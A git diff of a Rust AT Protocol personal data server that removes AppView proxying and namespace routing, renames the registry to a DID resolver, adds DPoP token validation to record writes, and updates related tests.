||||
.and_then(|v| v.to_str().ok())
|
||||
.map(|s| s.to_string());
|
||||
match resp.bytes().await {
|
||||
Ok(body) => {
|
||||
let mut builder = Response::builder().status(status);
|
||||
if let Some(ct) = content_type {
|
||||
builder = builder.header("content-type", ct);
|
||||
}
|
||||
builder
|
||||
.body(axum::body::Body::from(body))
|
||||
.unwrap_or_else(|_| {
|
||||
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
|
||||
})
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Error reading AppView response: {:?}", e);
|
||||
(
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({"error": "UpstreamError"})),
|
||||
)
|
||||
.into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Error proxying to AppView: {:?}", e);
|
||||
(
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({"error": "UpstreamError"})),
|
||||
)
|
||||
.into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn get_record(
|
||||
State(state): State<AppState>,
|
||||
Query(input): Query<GetRecordInput>,
|
||||
RawQuery(raw_query): RawQuery,
|
||||
) -> Response {
|
||||
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
|
||||
let user_id_opt = if input.repo.starts_with("did:") {
|
||||
@@ -106,8 +45,19 @@ pub async fn get_record(
|
||||
};
|
||||
let user_id: uuid::Uuid = match user_id_opt {
|
||||
Ok(Some(id)) => id,
|
||||
_ => {
|
||||
return proxy_get_record_to_appview(&state, raw_query.as_deref()).await;
|
||||
Ok(None) => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let record_row = sqlx::query!(
|
||||
@@ -192,61 +142,9 @@ pub struct ListRecordsOutput {
|
||||
pub records: Vec<serde_json::Value>,
|
||||
}
|
||||
|
||||
async fn proxy_list_records_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
|
||||
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.listRecords").await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "NotFound", "message": "Repo not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let target_url = match raw_query {
|
||||
Some(q) => format!("{}/xrpc/com.atproto.repo.listRecords?{}", resolved.url, q),
|
||||
None => format!("{}/xrpc/com.atproto.repo.listRecords", resolved.url),
|
||||
};
|
||||
info!("Proxying listRecords to AppView: {}", target_url);
|
||||
let client = proxy_client();
|
||||
match client.get(&target_url).send().await {
|
||||
Ok(resp) => {
|
||||
let status =
|
||||
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
|
||||
let content_type = resp
|
||||
.headers()
|
||||
.get("content-type")
|
||||
.and_then(|v| v.to_str().ok())
|
||||
.map(|s| s.to_string());
|
||||
match resp.bytes().await {
|
||||
Ok(body) => {
|
||||
let mut builder = Response::builder().status(status);
|
||||
if let Some(ct) = content_type {
|
||||
builder = builder.header("content-type", ct);
|
||||
}
|
||||
builder
|
||||
.body(axum::body::Body::from(body))
|
||||
.unwrap_or_else(|_| {
|
||||
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
|
||||
})
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Error reading AppView response: {:?}", e);
|
||||
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Error proxying to AppView: {:?}", e);
|
||||
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn list_records(
|
||||
State(state): State<AppState>,
|
||||
Query(input): Query<ListRecordsInput>,
|
||||
RawQuery(raw_query): RawQuery,
|
||||
) -> Response {
|
||||
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
|
||||
let user_id_opt = if input.repo.starts_with("did:") {
|
||||
@@ -268,8 +166,19 @@ pub async fn list_records(
|
||||
};
|
||||
let user_id: uuid::Uuid = match user_id_opt {
|
||||
Ok(Some(id)) => id,
|
||||
_ => {
|
||||
return proxy_list_records_to_appview(&state, raw_query.as_deref()).await;
|
||||
Ok(None) => {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
let limit = input.limit.unwrap_or(50).clamp(1, 100);
|
||||
|
||||
@@ -56,8 +56,10 @@ pub async fn prepare_repo_write(
|
||||
state: &AppState,
|
||||
headers: &HeaderMap,
|
||||
repo_did: &str,
|
||||
http_method: &str,
|
||||
http_uri: &str,
|
||||
) -> Result<(String, Uuid, Cid), Response> {
|
||||
let token = crate::auth::extract_bearer_token_from_header(
|
||||
let extracted = crate::auth::extract_auth_token_from_header(
|
||||
headers.get("Authorization").and_then(|h| h.to_str().ok()),
|
||||
)
|
||||
.ok_or_else(|| {
|
||||
@@ -67,15 +69,26 @@ pub async fn prepare_repo_write(
|
||||
)
|
||||
.into_response()
|
||||
})?;
|
||||
let auth_user = crate::auth::validate_bearer_token(&state.db, &token)
|
||||
.await
|
||||
.map_err(|_| {
|
||||
(
|
||||
StatusCode::UNAUTHORIZED,
|
||||
Json(json!({"error": "AuthenticationFailed"})),
|
||||
)
|
||||
.into_response()
|
||||
})?;
|
||||
let dpop_proof = headers
|
||||
.get("DPoP")
|
||||
.and_then(|h| h.to_str().ok());
|
||||
let auth_user = crate::auth::validate_token_with_dpop(
|
||||
&state.db,
|
||||
&extracted.token,
|
||||
extracted.is_dpop,
|
||||
dpop_proof,
|
||||
http_method,
|
||||
http_uri,
|
||||
false,
|
||||
)
|
||||
.await
|
||||
.map_err(|e| {
|
||||
(
|
||||
StatusCode::UNAUTHORIZED,
|
||||
Json(json!({"error": e.to_string()})),
|
||||
)
|
||||
.into_response()
|
||||
})?;
|
||||
if repo_did != auth_user.did {
|
||||
return Err((
|
||||
StatusCode::FORBIDDEN,
|
||||
@@ -172,10 +185,11 @@ pub struct CreateRecordOutput {
|
||||
pub async fn create_record(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
|
||||
Json(input): Json<CreateRecordInput>,
|
||||
) -> Response {
|
||||
let (did, user_id, current_root_cid) =
|
||||
match prepare_repo_write(&state, &headers, &input.repo).await {
|
||||
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
|
||||
Ok(res) => res,
|
||||
Err(err_res) => return err_res,
|
||||
};
|
||||
@@ -339,10 +353,11 @@ pub struct PutRecordOutput {
|
||||
pub async fn put_record(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
|
||||
Json(input): Json<PutRecordInput>,
|
||||
) -> Response {
|
||||
let (did, user_id, current_root_cid) =
|
||||
match prepare_repo_write(&state, &headers, &input.repo).await {
|
||||
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
|
||||
Ok(res) => res,
|
||||
Err(err_res) => return err_res,
|
||||
};
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
use reqwest::Client;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
use std::sync::Arc;
|
||||
use std::time::{Duration, Instant};
|
||||
use tokio::sync::RwLock;
|
||||
use tracing::{debug, error, info, warn};
|
||||
@@ -22,24 +23,28 @@ pub struct DidService {
|
||||
}
|
||||
|
||||
#[derive(Clone)]
|
||||
struct CachedAppView {
|
||||
struct CachedDid {
|
||||
url: String,
|
||||
did: String,
|
||||
resolved_at: Instant,
|
||||
}
|
||||
|
||||
pub struct AppViewRegistry {
|
||||
namespace_to_did: HashMap<String, String>,
|
||||
did_cache: RwLock<HashMap<String, CachedAppView>>,
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ResolvedService {
|
||||
pub url: String,
|
||||
pub did: String,
|
||||
}
|
||||
|
||||
pub struct DidResolver {
|
||||
did_cache: RwLock<HashMap<String, CachedDid>>,
|
||||
client: Client,
|
||||
cache_ttl: Duration,
|
||||
plc_directory_url: String,
|
||||
}
|
||||
|
||||
impl Clone for AppViewRegistry {
|
||||
impl Clone for DidResolver {
|
||||
fn clone(&self) -> Self {
|
||||
Self {
|
||||
namespace_to_did: self.namespace_to_did.clone(),
|
||||
did_cache: RwLock::new(HashMap::new()),
|
||||
client: self.client.clone(),
|
||||
cache_ttl: self.cache_ttl,
|
||||
@@ -48,31 +53,9 @@ impl Clone for AppViewRegistry {
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ResolvedAppView {
|
||||
pub url: String,
|
||||
pub did: String,
|
||||
}
|
||||
|
||||
impl AppViewRegistry {
|
||||
impl DidResolver {
|
||||
pub fn new() -> Self {
|
||||
let mut namespace_to_did = HashMap::new();
|
||||
|
||||
let bsky_did = std::env::var("APPVIEW_DID_BSKY")
|
||||
.unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
|
||||
namespace_to_did.insert("app.bsky".to_string(), bsky_did.clone());
|
||||
namespace_to_did.insert("com.atproto".to_string(), bsky_did);
|
||||
|
||||
for (key, value) in std::env::vars() {
|
||||
if let Some(namespace) = key.strip_prefix("APPVIEW_DID_") {
|
||||
let namespace = namespace.to_lowercase().replace('_', ".");
|
||||
if namespace != "bsky" {
|
||||
namespace_to_did.insert(namespace, value);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let cache_ttl_secs: u64 = std::env::var("APPVIEW_CACHE_TTL_SECS")
|
||||
let cache_ttl_secs: u64 = std::env::var("DID_CACHE_TTL_SECS")
|
||||
.ok()
|
||||
.and_then(|v| v.parse().ok())
|
||||
.unwrap_or(300);
|
||||
@@ -87,16 +70,9 @@ impl AppViewRegistry {
|
||||
.build()
|
||||
.unwrap_or_else(|_| Client::new());
|
||||
|
||||
info!(
|
||||
"AppView registry initialized with {} namespace mappings",
|
||||
namespace_to_did.len()
|
||||
);
|
||||
for (ns, did) in &namespace_to_did {
|
||||
debug!(" {} -> {}", ns, did);
|
||||
}
|
||||
info!("DID resolver initialized");
|
||||
|
||||
Self {
|
||||
namespace_to_did,
|
||||
did_cache: RwLock::new(HashMap::new()),
|
||||
client,
|
||||
cache_ttl: Duration::from_secs(cache_ttl_secs),
|
||||
@@ -104,45 +80,12 @@ impl AppViewRegistry {
|
||||
}
|
||||
}
|
||||
|
||||
pub fn register_namespace(&mut self, namespace: &str, did: &str) {
|
||||
info!("Registering AppView: {} -> {}", namespace, did);
|
||||
self.namespace_to_did
|
||||
.insert(namespace.to_string(), did.to_string());
|
||||
}
|
||||
|
||||
pub async fn get_appview_for_method(&self, method: &str) -> Option<ResolvedAppView> {
|
||||
let namespace = self.extract_namespace(method)?;
|
||||
self.get_appview_for_namespace(&namespace).await
|
||||
}
|
||||
|
||||
pub async fn get_appview_for_namespace(&self, namespace: &str) -> Option<ResolvedAppView> {
|
||||
let did = self.get_did_for_namespace(namespace)?;
|
||||
self.resolve_appview_did(&did).await
|
||||
}
|
||||
|
||||
pub fn get_did_for_namespace(&self, namespace: &str) -> Option<String> {
|
||||
if let Some(did) = self.namespace_to_did.get(namespace) {
|
||||
return Some(did.clone());
|
||||
}
|
||||
|
||||
let mut parts: Vec<&str> = namespace.split('.').collect();
|
||||
while !parts.is_empty() {
|
||||
let prefix = parts.join(".");
|
||||
if let Some(did) = self.namespace_to_did.get(&prefix) {
|
||||
return Some(did.clone());
|
||||
}
|
||||
parts.pop();
|
||||
}
|
||||
|
||||
None
|
||||
}
|
||||
|
||||
pub async fn resolve_appview_did(&self, did: &str) -> Option<ResolvedAppView> {
|
||||
pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> {
|
||||
{
|
||||
let cache = self.did_cache.read().await;
|
||||
if let Some(cached) = cache.get(did) {
|
||||
if cached.resolved_at.elapsed() < self.cache_ttl {
|
||||
return Some(ResolvedAppView {
|
||||
return Some(ResolvedService {
|
||||
url: cached.url.clone(),
|
||||
did: cached.did.clone(),
|
||||
});
|
||||
@@ -156,7 +99,7 @@ impl AppViewRegistry {
|
||||
let mut cache = self.did_cache.write().await;
|
||||
cache.insert(
|
||||
did.to_string(),
|
||||
CachedAppView {
|
||||
CachedDid {
|
||||
url: resolved.url.clone(),
|
||||
did: resolved.did.clone(),
|
||||
resolved_at: Instant::now(),
|
||||
@@ -167,7 +110,7 @@ impl AppViewRegistry {
|
||||
Some(resolved)
|
||||
}
|
||||
|
||||
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedAppView> {
|
||||
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedService> {
|
||||
let did_doc = if did.starts_with("did:web:") {
|
||||
self.resolve_did_web(did).await
|
||||
} else if did.starts_with("did:plc:") {
|
||||
@@ -185,7 +128,7 @@ impl AppViewRegistry {
|
||||
}
|
||||
};
|
||||
|
||||
self.extract_appview_endpoint(&doc)
|
||||
self.extract_service_endpoint(&doc)
|
||||
}
|
||||
|
||||
async fn resolve_did_web(&self, did: &str) -> Result<DidDocument, String> {
|
||||
@@ -275,13 +218,13 @@ impl AppViewRegistry {
|
||||
.map_err(|e| format!("Failed to parse DID document: {}", e))
|
||||
}
|
||||
|
||||
fn extract_appview_endpoint(&self, doc: &DidDocument) -> Option<ResolvedAppView> {
|
||||
fn extract_service_endpoint(&self, doc: &DidDocument) -> Option<ResolvedService> {
|
||||
for service in &doc.service {
|
||||
if service.service_type == "AtprotoAppView"
|
||||
|| service.id.contains("atproto_appview")
|
||||
|| service.id.ends_with("#bsky_appview")
|
||||
{
|
||||
return Some(ResolvedAppView {
|
||||
return Some(ResolvedService {
|
||||
url: service.service_endpoint.clone(),
|
||||
did: doc.id.clone(),
|
||||
});
|
||||
@@ -290,7 +233,7 @@ impl AppViewRegistry {
|
||||
|
||||
for service in &doc.service {
|
||||
if service.service_type.contains("AppView") || service.id.contains("appview") {
|
||||
return Some(ResolvedAppView {
|
||||
return Some(ResolvedService {
|
||||
url: service.service_endpoint.clone(),
|
||||
did: doc.id.clone(),
|
||||
});
|
||||
@@ -303,7 +246,7 @@ impl AppViewRegistry {
|
||||
"No explicit AppView service found for {}, using first service: {}",
|
||||
doc.id, service.service_endpoint
|
||||
);
|
||||
return Some(ResolvedAppView {
|
||||
return Some(ResolvedService {
|
||||
url: service.service_endpoint.clone(),
|
||||
did: doc.id.clone(),
|
||||
});
|
||||
@@ -326,7 +269,7 @@ impl AppViewRegistry {
|
||||
"No service found for {}, deriving URL from DID: {}://{}",
|
||||
doc.id, scheme, base_host
|
||||
);
|
||||
return Some(ResolvedAppView {
|
||||
return Some(ResolvedService {
|
||||
url: format!("{}://{}", scheme, base_host),
|
||||
did: doc.id.clone(),
|
||||
});
|
||||
@@ -335,79 +278,18 @@ impl AppViewRegistry {
|
||||
None
|
||||
}
|
||||
|
||||
fn extract_namespace(&self, method: &str) -> Option<String> {
|
||||
let parts: Vec<&str> = method.split('.').collect();
|
||||
if parts.len() >= 2 {
|
||||
Some(format!("{}.{}", parts[0], parts[1]))
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
|
||||
pub fn list_namespaces(&self) -> Vec<(String, String)> {
|
||||
self.namespace_to_did
|
||||
.iter()
|
||||
.map(|(k, v)| (k.clone(), v.clone()))
|
||||
.collect()
|
||||
}
|
||||
|
||||
pub async fn invalidate_cache(&self, did: &str) {
|
||||
let mut cache = self.did_cache.write().await;
|
||||
cache.remove(did);
|
||||
}
|
||||
|
||||
pub async fn invalidate_all_cache(&self) {
|
||||
let mut cache = self.did_cache.write().await;
|
||||
cache.clear();
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for AppViewRegistry {
|
||||
impl Default for DidResolver {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn get_appview_url_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
|
||||
registry.get_appview_for_method(method).await.map(|r| r.url)
|
||||
}
|
||||
|
||||
pub async fn get_appview_did_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
|
||||
registry.get_appview_for_method(method).await.map(|r| r.did)
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_extract_namespace() {
|
||||
let registry = AppViewRegistry::new();
|
||||
assert_eq!(
|
||||
registry.extract_namespace("app.bsky.actor.getProfile"),
|
||||
Some("app.bsky".to_string())
|
||||
);
|
||||
assert_eq!(
|
||||
registry.extract_namespace("com.atproto.repo.createRecord"),
|
||||
Some("com.atproto".to_string())
|
||||
);
|
||||
assert_eq!(
|
||||
registry.extract_namespace("com.whtwnd.blog.getPost"),
|
||||
Some("com.whtwnd".to_string())
|
||||
);
|
||||
assert_eq!(registry.extract_namespace("invalid"), None);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_get_did_for_namespace() {
|
||||
let mut registry = AppViewRegistry::new();
|
||||
registry.register_namespace("com.whtwnd", "did:web:whtwnd.com");
|
||||
|
||||
assert!(registry.get_did_for_namespace("app.bsky").is_some());
|
||||
assert_eq!(
|
||||
registry.get_did_for_namespace("com.whtwnd"),
|
||||
Some("did:web:whtwnd.com".to_string())
|
||||
);
|
||||
assert!(registry.get_did_for_namespace("unknown.namespace").is_none());
|
||||
}
|
||||
pub fn create_did_resolver() -> Arc<DidResolver> {
|
||||
Arc::new(DidResolver::new())
|
||||
}
|
||||
|
||||
29
src/lib.rs
29
src/lib.rs
@@ -317,35 +317,6 @@ pub fn app(state: AppState) -> Router {
|
||||
"/xrpc/app.bsky.actor.putPreferences",
|
||||
post(api::actor::put_preferences),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/app.bsky.actor.getProfile",
|
||||
get(api::actor::get_profile),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/app.bsky.actor.getProfiles",
|
||||
get(api::actor::get_profiles),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/app.bsky.feed.getTimeline",
|
||||
get(api::feed::get_timeline),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/app.bsky.feed.getAuthorFeed",
|
||||
get(api::feed::get_author_feed),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/app.bsky.feed.getActorLikes",
|
||||
get(api::feed::get_actor_likes),
|
||||
)
|
||||
.route(
|
||||
"/xrpc/app.bsky.feed.getPostThread",
|
||||
get(api::feed::get_post_thread),
|
||||
)
|
||||
.route("/xrpc/app.bsky.feed.getFeed", get(api::feed::get_feed))
|
||||
.route(
|
||||
"/xrpc/app.bsky.notification.registerPush",
|
||||
post(api::notification::register_push),
|
||||
)
|
||||
.route("/.well-known/did.json", get(api::identity::well_known_did))
|
||||
.route(
|
||||
"/.well-known/atproto-did",
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
use crate::appview::AppViewRegistry;
|
||||
use crate::appview::DidResolver;
|
||||
use crate::cache::{Cache, DistributedRateLimiter, create_cache};
|
||||
use crate::circuit_breaker::CircuitBreakers;
|
||||
use crate::config::AuthConfig;
|
||||
@@ -20,7 +20,7 @@ pub struct AppState {
|
||||
pub circuit_breakers: Arc<CircuitBreakers>,
|
||||
pub cache: Arc<dyn Cache>,
|
||||
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
|
||||
pub appview_registry: Arc<AppViewRegistry>,
|
||||
pub did_resolver: Arc<DidResolver>,
|
||||
}
|
||||
|
||||
pub enum RateLimitKind {
|
||||
@@ -87,7 +87,7 @@ impl AppState {
|
||||
let rate_limiters = Arc::new(RateLimiters::new());
|
||||
let circuit_breakers = Arc::new(CircuitBreakers::new());
|
||||
let (cache, distributed_rate_limiter) = create_cache().await;
|
||||
let appview_registry = Arc::new(AppViewRegistry::new());
|
||||
let did_resolver = Arc::new(DidResolver::new());
|
||||
|
||||
Self {
|
||||
db,
|
||||
@@ -98,7 +98,7 @@ impl AppState {
|
||||
circuit_breakers,
|
||||
cache,
|
||||
distributed_rate_limiter,
|
||||
appview_registry,
|
||||
did_resolver,
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -170,8 +170,9 @@ async fn test_update_email_via_notification_prefs() {
|
||||
let pool = get_pool().await;
|
||||
let (token, did) = create_account_and_login(&client).await;
|
||||
|
||||
let unique_email = format!("newemail_{}@example.com", uuid::Uuid::new_v4());
|
||||
let prefs = json!({
|
||||
"email": "newemail@example.com"
|
||||
"email": unique_email
|
||||
});
|
||||
let resp = client
|
||||
.post(format!("{}/xrpc/com.bspds.account.updateNotificationPrefs", base))
|
||||
@@ -217,5 +218,5 @@ async fn test_update_email_via_notification_prefs() {
|
||||
.await
|
||||
.unwrap();
|
||||
let body: Value = resp.json().await.unwrap();
|
||||
assert_eq!(body["email"], "newemail@example.com");
|
||||
assert_eq!(body["email"], unique_email);
|
||||
}
|
||||
|
||||
@@ -12,7 +12,7 @@ async fn test_search_accounts_as_admin() {
|
||||
let (user_did, _) = setup_new_user("search-target").await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.admin.searchAccounts",
|
||||
"{}/xrpc/com.atproto.admin.searchAccounts?limit=1000",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&admin_jwt)
|
||||
@@ -24,7 +24,7 @@ async fn test_search_accounts_as_admin() {
|
||||
let accounts = body["accounts"].as_array().expect("accounts should be array");
|
||||
assert!(!accounts.is_empty(), "Should return some accounts");
|
||||
let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did));
|
||||
assert!(found, "Should find the created user in results");
|
||||
assert!(found, "Should find the created user in results (DID: {})", user_did);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
@@ -111,6 +111,7 @@ async fn test_search_accounts_pagination() {
|
||||
#[tokio::test]
|
||||
async fn test_search_accounts_requires_admin() {
|
||||
let client = client();
|
||||
let _ = create_account_and_login(&client).await;
|
||||
let (_, user_jwt) = setup_new_user("search-nonadmin").await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
|
||||
@@ -1,135 +0,0 @@
|
||||
mod common;
|
||||
|
||||
use common::{base_url, client, create_account_and_login};
|
||||
use reqwest::StatusCode;
|
||||
use serde_json::{Value, json};
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_author_feed_returns_appview_data() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getAuthorFeed?actor={}",
|
||||
base, did
|
||||
))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
assert!(body["feed"].is_array(), "Response should have feed array");
|
||||
let feed = body["feed"].as_array().unwrap();
|
||||
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
|
||||
assert_eq!(
|
||||
feed[0]["post"]["record"]["text"].as_str(),
|
||||
Some("Author feed post from appview"),
|
||||
"Post text should match appview response"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_actor_likes_returns_appview_data() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getActorLikes?actor={}",
|
||||
base, did
|
||||
))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
assert!(body["feed"].is_array(), "Response should have feed array");
|
||||
let feed = body["feed"].as_array().unwrap();
|
||||
assert_eq!(feed.len(), 1, "Feed should have 1 liked post from appview");
|
||||
assert_eq!(
|
||||
feed[0]["post"]["record"]["text"].as_str(),
|
||||
Some("Liked post from appview"),
|
||||
"Post text should match appview response"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_post_thread_returns_appview_data() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getPostThread?uri=at://{}/app.bsky.feed.post/test123",
|
||||
base, did
|
||||
))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
assert!(
|
||||
body["thread"].is_object(),
|
||||
"Response should have thread object"
|
||||
);
|
||||
assert_eq!(
|
||||
body["thread"]["$type"].as_str(),
|
||||
Some("app.bsky.feed.defs#threadViewPost"),
|
||||
"Thread should be a threadViewPost"
|
||||
);
|
||||
assert_eq!(
|
||||
body["thread"]["post"]["record"]["text"].as_str(),
|
||||
Some("Thread post from appview"),
|
||||
"Post text should match appview response"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_feed_returns_appview_data() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
|
||||
base
|
||||
))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.unwrap();
|
||||
assert!(body["feed"].is_array(), "Response should have feed array");
|
||||
let feed = body["feed"].as_array().unwrap();
|
||||
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
|
||||
assert_eq!(
|
||||
feed[0]["post"]["record"]["text"].as_str(),
|
||||
Some("Custom feed post from appview"),
|
||||
"Post text should match appview response"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_register_push_proxies_to_appview() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.json(&json!({
|
||||
"serviceDid": "did:web:example.com",
|
||||
"token": "test-push-token",
|
||||
"platform": "ios",
|
||||
"appId": "xyz.bsky.app"
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
}
|
||||
@@ -141,9 +141,6 @@ async fn setup_with_external_infra() -> String {
|
||||
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
|
||||
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
|
||||
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
|
||||
unsafe {
|
||||
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
|
||||
}
|
||||
MOCK_APPVIEW.set(mock_server).ok();
|
||||
spawn_app(database_url).await
|
||||
}
|
||||
@@ -194,9 +191,6 @@ async fn setup_with_testcontainers() -> String {
|
||||
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
|
||||
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
|
||||
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
|
||||
unsafe {
|
||||
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
|
||||
}
|
||||
MOCK_APPVIEW.set(mock_server).ok();
|
||||
S3_CONTAINER.set(s3_container).ok();
|
||||
let container = Postgres::default()
|
||||
@@ -238,134 +232,7 @@ async fn setup_mock_did_document(mock_server: &MockServer, did: &str, service_en
|
||||
.await;
|
||||
}
|
||||
|
||||
async fn setup_mock_appview(mock_server: &MockServer) {
|
||||
Mock::given(method("GET"))
|
||||
.and(path("/xrpc/app.bsky.actor.getProfile"))
|
||||
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
|
||||
"handle": "mock.handle",
|
||||
"did": "did:plc:mock",
|
||||
"displayName": "Mock User"
|
||||
})))
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
Mock::given(method("GET"))
|
||||
.and(path("/xrpc/app.bsky.actor.searchActors"))
|
||||
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
|
||||
"actors": [],
|
||||
"cursor": null
|
||||
})))
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
Mock::given(method("GET"))
|
||||
.and(path("/xrpc/app.bsky.feed.getTimeline"))
|
||||
.respond_with(
|
||||
ResponseTemplate::new(200)
|
||||
.insert_header("atproto-repo-rev", "0")
|
||||
.set_body_json(json!({
|
||||
"feed": [],
|
||||
"cursor": null
|
||||
})),
|
